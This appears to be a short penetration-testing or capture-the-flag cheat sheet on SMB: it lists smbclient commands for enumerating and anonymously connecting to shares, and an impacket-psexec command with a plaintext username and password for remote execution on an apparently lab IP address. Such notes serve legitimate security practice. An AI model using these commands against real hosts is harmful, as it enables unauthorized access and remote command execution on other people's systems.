- You must see the contents of SAMBA shares ๐๏ธ
SMB ports
List shares and disks
- List SMB shares with
smbclient -L //IP_HOST
- Connect to a Disk by using
smbclient //IP_HOST/DISK
- This will connect you without credentials
Connect with credentials
- Once there connect to the target machine using Psexec
impacket-psexec 'bob:!P@$$W0rD!123Bill@10.10.166.94'
- Also:
smbclient -U <USER> //IP_HOST/DISK